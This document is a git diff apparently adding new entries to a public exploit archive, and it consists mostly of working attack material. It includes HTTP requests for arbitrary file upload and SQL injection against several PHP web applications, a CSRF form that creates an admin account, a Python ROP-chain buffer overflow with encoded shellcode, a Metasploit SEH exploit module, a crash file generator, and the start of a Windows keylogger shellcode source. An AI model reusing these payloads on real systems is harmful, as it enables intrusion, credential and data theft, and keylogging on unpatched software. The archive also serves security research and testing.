text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------187769406514267903921739782647 +Content-Length: 743 +-----------------------------187769406514267903921739782647 +Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------187769406514267903921739782647 +Content-Disposition: form-data; name="fileOld" +g_1540845821.php +-----------------------------187769406514267903921739782647 +Content-Disposition: form-data; name="users_id" +1 +-----------------------------187769406514267903921739782647 +Content-Disposition: form-data; name="user_type" +admin +-----------------------------187769406514267903921739782647 +Content-Disposition: form-data; name="submit1" +-----------------------------187769406514267903921739782647-- +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 20:50:40 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056; expires=Mon, 29-Oct-2018 22:50:40 GMT; Max-Age=7200; path=/; HttpOnly +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +refresh: 0;url=http://localhost/[PATH]/user/login +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +GET /[PATH]/assets/images/phpinfo_1540846240.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 20:51:11 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/user/add_edit +# + + +
+
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45752.txt b/exploits/php/webapps/45752.txt new file mode 100644 index 000000000..03ed6a9ba --- /dev/null +++ b/exploits/php/webapps/45752.txt @@ -0,0 +1,122 @@ +# Exploit Title: University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin) +# Dork: N/A +# Date: 2018-10-30 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/pamzey +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Patrick%20Mvuma/unima.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/process.php +# +#[PATH]/process.php +#.... +#1001 if(isset($_POST['addmember'])) +#1002 { +#1003 if($_POST['memail']!=''&&$_POST['mfname']!=''&&$_POST['msname']!=''&&$_POST['mpassword']!=''&&$_POST['mpasswords']!='') +#1004 { +#1005 +#1006 $mfname = mysqli_real_escape_string($db,$_POST['mfname']); +#1007 $msname = mysqli_real_escape_string($db,$_POST['msname']); +#1008 $memail=mysqli_real_escape_string($db,$_POST['memail']); +#1009 $mphone =mysqli_real_escape_string($db,$_POST['mphone']); +#1010 $rpassword = mysqli_real_escape_string($db,$_POST['mpasswords']); +#1011 $mpassword = mysqli_real_escape_string($db,$_POST['mpassword']); +#.... +POST /[PATH]/process.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 87 +mfname=efe&msname=efe&memail=efe@omerefe.com&mpassword=efe&mpasswords=efe&addmember=ghj +HTTP/1.1 302 Found +Date: Mon, 29 Oct 2018 18:44:36 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: addadmin.php +Content-Length: 127 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/process.php +# +#[PATH]/process.php +#.... +#973 if(isset($_POST['schoolgrade'])){ +#974 +#975 //$adname=$_POST['']; +#976 $adname =$_POST["schoolgrade"]; +#.... +POST /[PATH]/process.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 236 +schoolgrade='||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||' +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 18:51:22 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 421 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/process.php +# +#[PATH]/process.php +#.... +#516 if(isset($_POST['usernames'])&&$_POST['password']) { +#517 +#518 $usernames=$_POST['usernames']; +#519 $password=$_POST['password']; +#.... +POST /[PATH]/process.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 51 +usernames='or 1=1 or ''='&password='or 1=1 or ''=' +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 18:04:45 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800 +Set-Cookie: serial=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800 +Content-Length: 247 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45753.txt b/exploits/php/webapps/45753.txt new file mode 100644 index 000000000..ec54010f6 --- /dev/null +++ b/exploits/php/webapps/45753.txt @@ -0,0 +1,91 @@ +# Exploit Title: Notes Manager 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-30 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.webprojectbuilder.com/item/notes-management +# Software Link: https://astuteinternet.dl.sourceforge.net/project/notes-manager/notes_management.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/user/add_edit +# +# http://localhost/[PATH]/assets/images/[FILE] +# +POST /[PATH]/user/add_edit HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------95839047417419306891039500038 +Content-Length: 737 +-----------------------------95839047417419306891039500038 +Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------95839047417419306891039500038 +Content-Disposition: form-data; name="fileOld" +g_1540845821.php +-----------------------------95839047417419306891039500038 +Content-Disposition: form-data; name="users_id" +1 +-----------------------------95839047417419306891039500038 +Content-Disposition: form-data; name="user_type" +admin +-----------------------------95839047417419306891039500038 +Content-Disposition: form-data; name="submit1" +-----------------------------95839047417419306891039500038-- +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 21:10:19 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: ci_session=00cf0a180900e0b110b84343140d8f1c77a68493; expires=Mon, 29-Oct-2018 23:10:19 GMT; Max-Age=7200; path=/; HttpOnly +refresh: 0;url=http://localhost/[PATH]/user/login +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +GET /[PATH]/assets/images/phpinfo_1540847419.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=00cf0a180900e0b110b84343140d8f1c77a68493 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 21:10:42 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/user/add_edit +# + + +
+
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45754.txt b/exploits/php/webapps/45754.txt new file mode 100644 index 000000000..94d46db8c --- /dev/null +++ b/exploits/php/webapps/45754.txt @@ -0,0 +1,61 @@ +# Exploit Title: Instagram Clone 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-30 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/justinwilliam +# Software Link: https://www.sourcecodester.com/sites/default/files/download/justinwilliam/instagram_3.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/add_profile.php +# +# http://localhost/[PATH]/uploads/[FILE] +# +POST /[PATH]/add_profile.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------18601636361709893820977649577 +Content-Length: 369 +-----------------------------18601636361709893820977649577 +Content-Disposition: form-data; name="photo"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------18601636361709893820977649577 +Content-Disposition: form-data; name="submit" +-----------------------------18601636361709893820977649577-- +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 19:24:03 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1101 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/add_profile.php +# + + +
+ +
+ + + \ No newline at end of file diff --git a/exploits/windows/dos/45749.py b/exploits/windows/dos/45749.py new file mode 100755 index 000000000..025a32828 --- /dev/null +++ b/exploits/windows/dos/45749.py @@ -0,0 +1,25 @@ +# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC) +# Date: 2018-10-29 +# Exploit Author: Yair Rodríguez Aparicio +# Vendor Homepage: https://www.qnap.com/en/ +# Software Link: https://www.qnap.com/en/download +# Version: 4.5.6.0607 +# Tested on: Windows XP Profesional Español SP3 x86 + +# Steps to Produce the Crash: +# 1.- Run python code : python qnap.py +# 2.- Open text.txt and copy content to clipboard +# 3.- Open NetBak Replicator.exe +# 4.- click on Restauración Instantánea +# 5.- Seleccione Origen -> "Ubicacion de red" +# 6.- click on "Dirección URL WebDAV" +# 7.- Paste ClipBoard on "Dirección URL WebDAV" +# 8.- Click "Aceptar". +# 9.- Crashed! + + + +buffer = "\x41" * 5000 +f = open("text.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/45738.py b/exploits/windows/local/45738.py new file mode 100755 index 000000000..b93e93023 --- /dev/null +++ b/exploits/windows/local/45738.py @@ -0,0 +1,79 @@ +#!/usr/bin/python + + +############################################### +# R 3.4.4 Win10 x86 Buffer Overflow # +# discovered by: bzyo # +# author: Charles Truscott # +# I love you Alison Thompson OAM # +# tested on: Windows 10 x86 # +# rebooted for practice defeating ASLR/DEP # +# # +# --------------------------------------------# + +############################################## + +# GUI Preferences -> paste boom.txt into 'Language for menus ...' -> click OK + +import struct + +pad = "A" * 292 + +rop = struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll] +rop += struct.pack("L", 0x6e732b48) # ptr to &VirtualAlloc() [IAT R.dll] +rop += struct.pack("L", 0x6cba178c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [R.dll] +rop += struct.pack("L", 0x6ca57139) # XCHG EAX,ESI # RETN [R.dll] +rop += struct.pack("L", 0x6bed7b2a) # POP EBP # RETN [Rlapack.dll] +rop += struct.pack("L", 0x6ca2a9bd) # & jmp esp [R.dll] +rop += struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll] +rop += struct.pack("L", 0xffffffff) # Value to negate, will become 0x00000001 +rop += struct.pack("L", 0x6397474a) # NEG EAX # RETN [graphics.dll] +rop += struct.pack("L", 0x6c94e84f) # XCHG EAX,EBX # RETN [R.dll] +rop += struct.pack("L", 0x6cbef3e4) # POP EAX # RETN [R.dll] +rop += struct.pack("L", 0xe7bf59f1) # put delta into eax (-> put 0x00001000 into edx) +rop += struct.pack("L", 0x6fed580f) # ADD EAX,1840B60F # RETN [grDevices.dll] +rop += struct.pack("L", 0x6ca3485a) # XCHG EAX,EDX # RETN [R.dll] +rop += struct.pack("L", 0x63760b48) # POP ECX # RETN [Rgraphapp.dll] +rop += struct.pack("L", 0xffffffc0) # Value to negate, will become 0x00000040 +rop += struct.pack("L", 0x71364d80) # NEG ECX # RETN [stats.dll] +rop += struct.pack("L", 0x6fed44a0) # POP EDI # RETN [grDevices.dll] +rop += struct.pack("L", 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll] +rop += struct.pack("L", 0x6c998dce) # POP EAX # RETN [R.dll] +rop += struct.pack("L", 0x90909090) # nop +rop += struct.pack("L", 0x7135a86c) # PUSHAD # RETN [stats.dll] + + +nop = "A" * 20 + +# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' cmd=calc.exe exitfunc=thread -f python + +boom = "" +boom += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" +boom += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" +boom += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" +boom += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" +boom += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" +boom += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" +boom += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" +boom += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" +boom += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" +boom += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" +boom += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" +boom += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" +boom += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" +boom += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" +boom += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" +boom += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" +boom += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" + + + + +end = "\xCC" * 588 + +poc = pad + rop + nop + boom + end + +file = open("boom.txt", "w") +file.write(poc) +file.close +print "<3" \ No newline at end of file diff --git a/exploits/windows/local/45744.rb b/exploits/windows/local/45744.rb new file mode 100755 index 000000000..0e43f3855 --- /dev/null +++ b/exploits/windows/local/45744.rb @@ -0,0 +1,72 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)', + 'Description' => %q{ + This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when + with the name "hack.txt". Copy the content of the "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register" + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Abdullah Alıç', # Original discovery + 'd3ckx1 d3ck(at)qq.com', # MSF module + ], + 'References' => + [ + [ 'OSVDB', '' ], + [ 'EBD', '45627' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d", + 'DisableNops' => true, + 'Space' => 10000 + }, + 'Targets' => + [ + [ 'Any Sound Recorder 2.93', + { + 'Ret' => 0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3 + 'Offset' => 900 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 25 2018', + 'DefaultTarget' => 0)) + + register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class) + + end + + def exploit + buf = "\x90"*(target['Offset']) + buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload) + buf << [target.ret] .pack('V') # seh + buf << make_nops(10) + buf << payload.encoded + buf << "\x90" * 200 + + file_create(buf) + handler + + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4e22bdb53..e0c3d7e86 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6165,6 +6165,9 @@ id,file,description,date,author,type,platform,port 45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux, 45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows, 45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows, +45746,exploits/hardware/dos/45746.php,"ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure",2018-10-30,"numan türle",dos,hardware,21 +45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows, +45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10063,6 +10066,9 @@ id,file,description,date,author,type,platform,port 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple, 45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64, 45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86, +45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows, +45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd, +45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16907,6 +16913,7 @@ id,file,description,date,author,type,platform,port 45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25 45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows, 45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux, +45748,exploits/multiple/remote/45748.py,"Nutanix AOS & Prism < 5.5.5 (LTS) / < 5.8.1 (STS) - SFTP Authentication Bypass",2018-10-30,"Adam Brown",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40247,3 +40254,16 @@ id,file,description,date,author,type,platform,port 45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80 45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80 45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80 +45737,exploits/php/webapps/45737.txt,"Electricks eCommerce 1.0 - 'prodid' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80 +45739,exploits/php/webapps/45739.txt,"phptpoint Pharmacy Management System 1.0 - 'username' SQL Injection",2018-10-30,"Boumediene KADDOUR",webapps,php,80 +45740,exploits/php/webapps/45740.txt,"Webiness Inventory 2.9 - Arbitrary File Upload",2018-10-30,"Boumediene KADDOUR",webapps,php,80 +45741,exploits/hardware/webapps/45741.txt,"NETGEAR WiFi Router R6120 - Credential Disclosure",2018-10-30,Wadeek,webapps,hardware,80 +45747,exploits/php/webapps/45747.txt,"MyBB Downloads 2.0.3 - SQL Injection",2018-10-30,"Lucian Ioan Nitescu",webapps,php,80 +45751,exploits/php/webapps/45751.txt,"Expense Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 +45752,exploits/php/webapps/45752.txt,"University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)",2018-10-30,"Ihsan Sencan",webapps,php,80 +45753,exploits/php/webapps/45753.txt,"Notes Manager 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 +45754,exploits/php/webapps/45754.txt,"Instagram Clone 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 +45755,exploits/jsp/webapps/45755.txt,"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal",2018-10-30,"Rafael Pedrero",webapps,jsp,80 +45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80 +45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 8df0ac196..872f19abb 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -921,3 +921,4 @@ id,file,description,date,author,type,platform 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 +45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 diff --git a/shellcodes/windows_x86-64/45743.c b/shellcodes/windows_x86-64/45743.c new file mode 100644 index 000000000..4ced59158 --- /dev/null +++ b/shellcodes/windows_x86-64/45743.c @@ -0,0 +1,1020 @@ +/* + + # Title : Windows x64 Remote Keylogger (UDP) + # size : 864 bytes + # Author : Roziul Hasan Khan Shifat + # Tested On : Windows 10 x64 pro + # Date : 26-10-2018 + # Email: shifath12@gmail.com + +*/ + + + +/* + + +keyl.obj: file format pe-x86-64 + + +Disassembly of section .text: + +0000000000000000 <_start>: + 0: eb 1d jmp 1f + +0000000000000002 <_init_>: + 2: 48 31 d2 xor rdx,rdx + 5: 65 48 8b 42 60 mov rax,QWORD PTR gs:[rdx+0x60] + a: 48 8b 40 18 mov rax,QWORD PTR [rax+0x18] + e: 48 8b 40 20 mov rax,QWORD PTR [rax+0x20] + 12: 48 8b 30 mov rsi,QWORD PTR [rax] + 15: 48 8b 06 mov rax,QWORD PTR [rsi] + 18: 48 8b 70 20 mov rsi,QWORD PTR [rax+0x20] + 1c: 5b pop rbx + 1d: 53 push rbx + 1e: c3 ret + +000000000000001f : + 1f: e8 de ff ff ff call 2 <_init_> + +0000000000000024 <_p2_>: + 24: 52 push rdx + 25: 52 push rdx + 26: 4c 8d 3c 24 lea r15,[rsp] + 2a: 48 83 ec 38 sub rsp,0x38 + 2e: 4c 8d 24 24 lea r12,[rsp] + 32: 48 83 ec 58 sub rsp,0x58 